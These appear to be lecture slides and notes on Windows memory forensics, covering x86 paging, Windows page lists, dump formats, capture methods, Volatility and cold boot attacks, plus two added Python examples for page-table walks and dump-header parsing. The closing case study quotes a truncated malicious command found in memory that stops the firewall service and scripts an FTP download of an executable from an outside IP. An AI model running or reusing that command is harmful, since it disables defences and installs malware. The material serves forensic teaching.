Memory Forensics presentation from one of my lectures. I have tried to explain the functioning of memory in 32-bit architecture, how paging works, how Windows manages its memory pages and how the memory forensics job is done. The forensics part focuses on collecting data and analyzing it.
Who am I. What has been written in forensics books is "Pull the plug". Things changed post 2005.
Note that device drivers run in kernel mode and are therefore inside the protection boundary. A faulty driver may cause a BSoD because it manipulates memory in kernel mode.
A 32-bit address bus can specify up to 4 GB of addresses (2^32 locations).
Two-level structure: 1024 x 1024 x 4 KB pages. Every process has: a PDE structure (every entry has 20 bits pointing to a page table number and 12 bits for page protection and other housekeeping); a PTE structure (every entry has 20 bits pointing to a 4 KB page, for a total of 1024 x 4 KB pages, and 12 bits for housekeeping); PFN (the page frame number is the 4 KB frame in memory). The processor uses 10 bits to find the PDE, 10 bits to find the PTE and 12 bits to identify the individual byte within the 4 KB page.
Crash dump: good for analysis; dumped with Windows in a frozen state; debugging tools are available from Microsoft. Cons: it writes to the hard drive; by default only Windows 2003 dumps the full memory (the options are a small 64 KB dump, a kernel dump and a full dump); the dump can be forced only with a registry tweak, and only after the system is restarted following the tweak; a full dump is available only on systems with up to 2 GB of RAM; the contents of the pagefile are overwritten, as the dump first freezes the system, dumps the RAM into the pagefile and then proceeds from there. Winen: proprietary format from EnCase; it can be converted to other formats, including raw, with FTK Imager from AccessData. Vmem: a virtual machine can be suspended and a perfect image is stored in the .vmem file; the format is similar to raw and the same tools are used to parse it. .Bin: a dump format from Windows. Hibernation file: compressed; the file format was revealed by Matthieu Suiche for Sandman (now part of Volatility). It can be used as a memory dump, or as an additional dump to compare with the current dump.
Memory is dynamic, so try to stop all other activities while performing the capture. What do you get: RAM, or RAM + pagefile?
Firewire device: extremely fast because it uses DMA and bypasses the OS; see the storm.net.nz project, a software driver that can be installed in BackTrack and other packages and fools the Windows OS into believing the device is an iPod. Not very successful: Blue Screens of Death have been reported and it misses a few parts of the memory. Tribble needs to be installed in the machine prior to the incident. All in all, not much success on the hardware front; for the most part only software is used for memory dumping, which might in fact rely on DLLs already compromised on the system.
Strings and grep: raw searches that don't provide the full context in which a string is used. Memparser won the DFRWS (Digital Forensics Research Workshop) 2005 challenge. Volatility.
Memory Forensics: Don't pull the Plug. Shri Boonlia Prince Komal. Gmail: email@example.com. Facebook: http://www.facebook.com/home.php?#!/profile.php?id=1701055902 or search for my mail id firstname.lastname@example.org. Twitter: http://twitter.com/boonlia
Live / Dead Memory Forensics
• What is live memory and what is dead memory?
– RAM
– Pagefile
– Hibernation file
(Diagram: live memory forensics covers RAM; the hard drive holds the pagefile. Where is the hibernation file?)
Few Basics of RAM
• A grid of capacitors (DRAM)
• Bucket with holes
• Random access
• Parity bit for error reporting
A Grid of Capacitors
Row Select: set to high for the related row. Column Select: set to high for the related column. Read/write line: set to high for read and low for write. Data flows in or out depending on the R/W state.
Address Bus: carries the address of the memory location. Data Bus: carries the data in and out through the same wires (read/write bus, or simply data bus).
Bucket with holes (DRAM)
Capacitors by their very nature get discharged rapidly. Any read/write operation adds to these capacitors being discharged. This calls for regular refreshing, wherein the entire data is read and written back. SRAM uses transistors (2-4 per bit) to show the on or off state of each bit.
Memory Address Space
Byte-addressable memory (reads 8 bits at a time).
32-bit processor: 2^32 = 4 GB; 40-bit implementation: 1024 GB.
64-bit processor: 2^64 = 17 billion GB; 50-bit implementation: 1024 TB.
Memory management at a glance (diagram: Processor, Memory Manager, Application, and DMA?)
Need for a Memory Manager
• Protect operating system and kernel memory space
• Prevent application violations (accessing other applications' memory)
• Allocate memory judiciously
• Allow multiple applications to co-exist
• Improve memory utilization efficiency
• Extend the memory capacity via swapping
• Provide applications a simpler platform to use memory (virtual memory space): you don't have to create two programs for 1 GB and 2 GB RAM machines
• Manage the shared memory
User mode vs. kernel mode
• Memory protection
• Location of both the modes in RAM
• /3GB switch in boot.ini
• Where the page directory and page table entries are stored
• What if user mode needs to access something in kernel mode?
Kernel mode and user mode (diagram: the 4 GB space without PAE and with PAE; location of the page table and page directory)
Overview of Virtual Memory Management on x86 Processor: TLB (translation lookaside buffer)
Memory management in Windows
• Windows on 32-bit x86 architecture can access up to 4 GB of memory
• Windows can provide 4 GB of memory space to each of multiple processes despite the total memory being 4 GB max
• This is done by using the x86 feature called paging
• Every memory page is 4 KB
The Paging Process in x86 processor (image source: technet.microsoft.com)
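An added example (not from the slides) of the two-level paging scheme described in the notes above and on the Windows memory management slides: it splits a 32-bit virtual address into its 10/10/12-bit parts, splits a PDE/PTE into its 20-bit frame number and 12-bit flags, and walks a constructed page directory and page table the way a memory-forensics tool must, refusing to translate an entry whose present bit is clear (a page that has been swapped to the pagefile). The physical "image" and its entries are constructed here for illustration.

```python
# Constructed 32-bit x86 two-level paging walk (not from the original slides).
PAGE_SIZE = 4096
P_PRESENT = 1 << 0   # bit 0: entry maps a page (or page table) that is in RAM
P_RW      = 1 << 1   # bit 1: writable
P_USER    = 1 << 2   # bit 2: accessible from user mode

def split_va(va):
    """(PDE index, PTE index, byte offset) of a 32-bit virtual address."""
    return (va >> 22) & 0x3FF, (va >> 12) & 0x3FF, va & 0xFFF

def entry_parts(entry):
    """Split a 32-bit PDE/PTE into its 20-bit frame number and 12-bit flags."""
    return entry >> 12, entry & 0xFFF

def read_entry(phys, base, index):
    return int.from_bytes(phys[base + index * 4: base + index * 4 + 4], "little")

def translate(va, phys, pd_base):
    """Walk PD -> PT -> page in the physical image; None if not present."""
    pdi, pti, off = split_va(va)
    pt_pfn, pde_flags = entry_parts(read_entry(phys, pd_base, pdi))
    if not pde_flags & P_PRESENT:
        return None                      # no page table for this 4 MB region
    pfn, pte_flags = entry_parts(read_entry(phys, pt_pfn * PAGE_SIZE, pti))
    if not pte_flags & P_PRESENT:
        return None                      # page is paged out (look in pagefile)
    return pfn * PAGE_SIZE + off

# Constructed 8-frame "physical memory": frame 0 = page directory,
# frame 1 = page table for PDE 0, frame 5 = a data page, frame 6 paged out.
phys = bytearray(8 * PAGE_SIZE)

def set_entry(frame, index, pfn, flags):
    start = frame * PAGE_SIZE + index * 4
    phys[start:start + 4] = ((pfn << 12) | flags).to_bytes(4, "little")

set_entry(0, 0, 1, P_PRESENT | P_RW | P_USER)   # PDE 0 -> page table in frame 1
set_entry(1, 3, 5, P_PRESENT | P_RW | P_USER)   # PTE 3 -> data page in frame 5
set_entry(1, 4, 6, P_RW)                        # PTE 4: present bit clear
phys[5 * PAGE_SIZE + 0x10: 5 * PAGE_SIZE + 0x14] = b"SECR"   # sample data

if __name__ == "__main__":
    va = (0 << 22) | (3 << 12) | 0x10                 # PDE 0, PTE 3, offset 0x10
    pa = translate(va, phys, 0)
    print(hex(va), "->", hex(pa), bytes(phys[pa:pa + 4]))   # 0x3010 -> 0x5010 b'SECR'
    print(hex(0x4000), "->", translate(0x4000, phys, 0))    # None (not present)
```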
Few Concepts in Windows Memory Management: process memory usage counters are Virtual Size, Private Bytes and Working Set. (Diagram: physical memory, say 1 GB, against a 2 GB virtual size, showing private bytes, working set and shared memory.)
Page lists in Windows (don't confuse with the page table)
1) Zero page list: pages that carry no data and are ready to be assigned to a process
2) Standby page list: unmodified pages that are taken away from a process
3) Free page list: pages not being used by any process and free, but still containing data
4) Modified page list: modified pages pertaining to a process, taken away from that process
Windows Memory Management at a Glance (diagram: a process's working set, pages needed and no longer needed, the modified and standby page lists, the zero and free page lists, and saved data on the hard drive; exceeding memory use or a memory-crunch situation is shown in red font)
Memory Management in OS
• Memory Manager
– Large address space: user programs can reference more memory than physically exists
– Protection: the memory for a process is private and cannot be read or modified by another process; also, the memory manager prevents processes from overwriting code and read-only data
– Memory mapping: clients can map a file into an area of virtual memory and access the file as memory
– Fair access to physical memory: the memory manager ensures that all processes have fair access to the machine's memory resources, thus ensuring reasonable system performance
– Shared memory: the memory manager allows processes to share some portion of their memory. For example, executable code is usually shared amongst processes
What can be found in memory
• The running processes
• The running threads
• The passwords/keys and other information
• Live registry hives
• Live chats and login information
• Malware presence including rootkits
• Open connections to the net/network
• Open files and their remnants
• In fact anything that the processor works upon
The Process of Memory Forensics
• Capture the memory
• Analyze the memory
• Reconstruction of the memory state
• Reconstruction of the entire scenario with disk image and memory image in conjunction
Various formats
• Raw dump (linear format) (.img/.dd)
• Windows crash dump format (.bin): BSoD (written after the system is frozen)
• Hiberfil.sys format
• Commercial tool formats
– Winen (.E01 kind of format)
– .Vmem (VMware)
– .Bin (Hyper-V)
– Fastdump Pro (hpak)
Hardware approach
• Firewire port device (DMA): http://www.storm.net.nz/projects/16
• PCI device by Brian Carrier and Joe Grand: Tribble device
Analysing the memory dump
• String search with strings.exe
• Grep search with the grep command
• DFRWS 2005 (Memparser)
• 2007: Aaron Walters, Volatility framework
• Several plugins for Volatility
• Pdfbook, Pdgmail, Pdymail, Skypeeks
• Memparser
• Memoryze and Audit Viewer
Volatility Framework: what is Volatility; Volatility plugins; using Volatility on memory dumps; demo with a few options for analysis
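An added example (not from the slides or from Volatility) for the dump formats discussed in the notes and in the "Various formats" slide: it tells the formats apart by their leading bytes, and for a 32-bit Windows crash dump reads the DirectoryTableBase (the physical address of the page directory that a page-table walk starts from) and the bug-check code out of the header. The signatures and the DUMP_HEADER field offsets are assumptions taken from public format descriptions, and the sample headers are constructed; raw .dd/.img/.vmem dumps have no header, so they fall through to a generic label.

```python
import struct

# Leading-byte signatures (assumed from public format descriptions).
SIGNATURES = [
    (b"PAGEDUMP", "windows crash dump, 32-bit"),
    (b"PAGEDU64", "windows crash dump, 64-bit"),
    (b"hibr",     "hibernation file (hiberfil.sys)"),
    (b"HIBR",     "hibernation file (hiberfil.sys)"),
    (b"wake",     "hibernation file, header cleared after resume"),
    (b"WAKE",     "hibernation file, header cleared after resume"),
    (b"EVF\x09\x0d\x0a\xff\x00", "EnCase EWF/E01 container (Winen)"),
]

def identify(data):
    """Best-effort format label from the first bytes of a dump file."""
    for magic, label in SIGNATURES:
        if data.startswith(magic):
            return label
    return "raw/linear dump (no header) or unknown format"

def parse_crashdump32(data):
    """Selected 32-bit DUMP_HEADER fields (assumed offsets); None if not one."""
    if not data.startswith(b"PAGEDUMP") or len(data) < 0x2C:
        return None
    # Offsets 0x08..0x28: nine little-endian DWORDs follow the 8-byte signature.
    (major, minor, dtb, pfn_db, mod_list,
     proc_head, machine, ncpu, bugcheck) = struct.unpack_from("<9I", data, 8)
    return {
        "MajorVersion": major, "MinorVersion": minor,
        "DirectoryTableBase": dtb,        # CR3: where the page-table walk starts
        "PfnDataBase": pfn_db,
        "PsLoadedModuleList": mod_list,
        "PsActiveProcessHead": proc_head,  # entry point for listing processes
        "MachineImageType": machine,       # 0x14C = IMAGE_FILE_MACHINE_I386
        "NumberProcessors": ncpu,
        "BugCheckCode": bugcheck,
    }

def build_sample_crashdump():
    """Constructed 32-bit crash dump header for testing; all values made up."""
    hdr = b"PAGEDUMP" + struct.pack("<9I", 0xF, 0xA28, 0x00039000, 0x80C00000,
                                     0x8055A420, 0x8055A1D8, 0x14C, 2, 0x7E)
    return hdr + b"\x00" * (4096 - len(hdr))

if __name__ == "__main__":
    sample = build_sample_crashdump()
    print(identify(sample))
    print({k: hex(v) for k, v in parse_crashdump32(sample).items()})
    print(identify(b"hibr" + b"\x00" * 60), "|", identify(b"\x00" * 64))
```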
Cold Boot Attack
• Memory doesn't get emptied that fast
• Even 30 seconds to minutes after system shutdown, the memory still contains data
• This time can be prolonged if the memory is cooled down: coolant applied instantly reduces the temperature to -50
Case Study: shell command found in memory: C:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 220.127.116.11> cmd.txt&echo chajian>> cmd.txt&echo 123>> cmd.txt&echo binary>>cmd.txt&echo get seo.exe>>…………..
Gmail: email@example.com. Facebook: http://www.facebook.com/home.php?#!/profile.php?id=1701055902 or search for my mail id firstname.lastname@example.org. Twitter: http://twitter.com/#!/boonlia. nullcon.net, nullcon Goa 2010